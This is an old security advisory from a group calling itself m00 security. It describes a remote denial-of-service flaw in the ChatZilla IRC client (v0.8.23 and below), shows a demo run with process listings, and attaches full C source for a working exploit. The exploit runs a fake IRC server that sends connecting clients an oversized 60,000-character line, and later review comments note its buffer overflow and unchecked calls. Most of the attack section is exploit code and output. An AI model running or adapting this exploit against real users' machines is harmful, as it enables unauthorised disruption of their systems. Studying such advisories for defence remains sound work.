
ChatZilla <=v0.8.23 remote DoS vulnerability


--Boundary-00=_JiAZ/wSebLUeBzV
Content-Type: text/plain;
  charset="us-ascii"
Content-Transfer-Encoding: 7bit
Content-Disposition: inline

/**********************************************************
*
*                m00 security advisory #003
*
*    ChatZilla <=v0.8.23 remote DoS vulnerability
*
*                     www.m00security.org
*
************************************************************/

---------------------------------
Product: ChatZilla
Version: 0.8.23 and below
OffSite: www.mozilla.org
---------------------------------

Overview:

ChatZilla is a (popular?) Linux IRC client. Mozilla/5.0 includes it.

Problem description:

It's possible to freeze the system by sending a special request
with a very long string (60kb) to ChatZilla. The vuln could be used
by an IRC server. Look at the attached exploit source code for more
info. Example on localhost:

[root@localhost 0dd]# gcc -o m00-ChatZilla m00-ChatZilla.c
[root@localhost 0dd]# ./m00-ChatZilla 6667

ChatZilla <=v0.8.23 remote DoS exploit // www.m00security.org

[~] Generating evil buf.... OK
[+] fake ircd created on port 6667
[+] User connected. Attacking.... OK

[root@localhost 0dd]# ps -aux | grep mozilla-bin
satan     2128  0.0 12.3 49588 31564 ?       S    19:33   0:00 
/usr/lib/mozilla-1.3/mozilla-bin
satan     2118 29.4 12.3 49588 31564 ?       R    19:33   0:29 
/usr/lib/mozilla-1.3/mozilla-bin  <-----
satan     2127  0.0 12.3 49588 31564 ?       S    19:33   0:00 
/usr/lib/mozilla-1.3/mozilla-bin
satan     2129  0.0 12.3 49588 31564 ?       S    19:33   0:00 
/usr/lib/mozilla-1.3/mozilla-bin
satan     2130  0.0 12.3 49588 31564 ?       S    19:33   0:00 
/usr/lib/mozilla-1.3/mozilla-bin
satan     2131  0.0 12.3 49588 31564 ?       S    19:33   0:00 
/usr/lib/mozilla-1.3/mozilla-bin

....after ~10 min, CPU usage increases to ~90% on an Athlon XP 2000

[root@localhost 0dd]# ps -aux | grep mozilla-bin
satan     2128  0.0 12.4 49588 31820 ?       S    19:33   0:00 
/usr/lib/mozilla-1.3/mozilla-bin
satan     2118 88.8 12.4 49588 31820 ?       R    19:33  10:45 
/usr/lib/mozilla-1.3/mozilla-bin <-----
satan     2127  0.0 12.4 49588 31820 ?       S    19:33   0:00 
/usr/lib/mozilla-1.3/mozilla-bin
satan     2129  0.0 12.4 49588 31820 ?       S    19:33   0:00 
/usr/lib/mozilla-1.3/mozilla-bin
satan     2130  0.0 12.4 49588 31820 ?       S    19:33   0:00 
/usr/lib/mozilla-1.3/mozilla-bin
satan     2131  0.0 12.4 49588 31820 ?       S    19:33   0:00 
/usr/lib/mozilla-1.3/mozilla-bin

Exploit attached.

(c) m00 Security / d4rkgr3y [d4rk@securitylab.ru]


--Boundary-00=_JiAZ/wSebLUeBzV
Content-Type: text/x-csrc;
  charset="us-ascii";
  name="m00-ChatZilla.c"
Content-Transfer-Encoding: 7bit
Content-Disposition: attachment; filename="m00-ChatZilla.c"

/*
 *  ChatZilla <=v0.8.23 remote DoS exploit
 *
 *  by m00 Security // www.m00security.org
 *
 *  This sploit creates a fake irc-server on any port. Every connected
 *  ChatZilla client will have 100% cpu-usage.
 *
 *  Complete advisory:
 *  www.m00security.org/adv/adv003.txt
 *
 *  -d4rkgr3y [d4rk@securitylab.ru]
 */

#include<sys/types.h>
#include<sys/socket.h>
#include<netinet/in.h>
#include<arpa/inet.h>
#include<unistd.h>
#include<signal.h>
#include<stdio.h>
#include<stdlib.h>
#include<string.h>

#define COUNT 60000
#define request "NOTICE AUTH :*** Welcome to fake m00 IRCd\n"

/*
 * Entry point: builds one oversized IRC line, then acts as a one-shot
 * fake IRC server that sends it to the first client that connects.
 *
 * argv[1] is the TCP port to listen on. Returns 0 after serving one
 * client; exits 1 on bad arguments and 0 (via _exit) on bind() failure.
 *
 * NOTE(review): this listing has defects of its own, documented here and
 * deliberately left unfixed:
 *  - buf is 60000 bytes, but it receives the 44-byte greeting literal,
 *    COUNT (60000) 'A' bytes, a "\n" and the terminating NUL. The strcat
 *    loop therefore writes ~46 bytes past the end of buf (undefined
 *    behaviour), and the later strlen(buf) reads past it as well.
 *  - socket(), accept() and both write() calls are unchecked.
 *  - the while(1) loop returns on its first pass, so only one client is
 *    ever handled, regardless of what the header comment says.
 *  - the "User connected" message is printed before accept() blocks.
 */
int main(int argc, char **argv)
{
	struct sockaddr_in db;
	int sock, i, len, lame;	/* len is passed to accept(), which expects socklen_t * */
	const c = COUNT;	/* implicit int: pre-C99 style, should read const int c */
	char buf[60000] = ":Serv 000 user666 :Welcome to the underworld";	/* 44 chars; no room for COUNT more */
	printf("\nChatZilla <=v0.8.23 remote DoS exploit // www.m00security.org\n\n");
	if (argc!=2){
		printf("[-] error in params. Usage\n %s port\n",argv[0]);
		exit(1);
	} else {
		printf("[~] Generating evil buf....");
	}
	/* constructing evil buf: one 60000-character IRC line without a line
	 * break. Each strcat() rescans buf from the start, so this loop is
	 * O(COUNT^2); more importantly it overruns buf (see header note). */
	for (i=0;i<c;i++)
	{
		strcat(buf,"A");
	}
	strcat(buf,"\n");	/* terminate the IRC line; this and the NUL land past buf's end */
	printf(" OK\n");
	/* creating fake irc-server: listen on all interfaces, port argv[1].
	 * atoi() is unchecked, so a non-numeric port silently becomes 0. */
	db.sin_family = AF_INET;
	db.sin_addr.s_addr = INADDR_ANY;
	db.sin_port = htons(atoi(argv[1]));
	sock = socket(PF_INET, SOCK_STREAM, 0);	/* return value unchecked; -1 would reach bind() */
	if(bind(sock, (struct sockaddr*)&db, sizeof(db)) == -1) {
		perror("[-] bind()");
		_exit(0);	/* exit status 0 on an error path, inconsistent with exit(1) above */
	}
	/* OK */
	printf("[+] fake ircd created on port %s\n",argv[1]);
	/* waiting for connect. The loop body ends in return, so only the first
	 * client is served. */
	listen(sock, SOMAXCONN);
	while(1) {
		printf("[+] User connected. Attacking....");	/* printed before accept() returns */
		len = sizeof(db);
		lame = accept(sock, (struct sockaddr*)&db, &len);	/* unchecked: on failure lame is -1 and the writes below fail */
		/* go go go: send the short greeting first, then the oversized line.
		 * write() results are ignored, so short or failed writes go unnoticed. */
		write(lame,request,strlen(request));
		write(lame,buf,strlen(buf));	/* strlen(buf) walks past the array because the NUL is beyond buf's end */
		printf(" OK\n");
		close(lame);
		close(sock);
		return(0);
	}
}

--Boundary-00=_JiAZ/wSebLUeBzV--
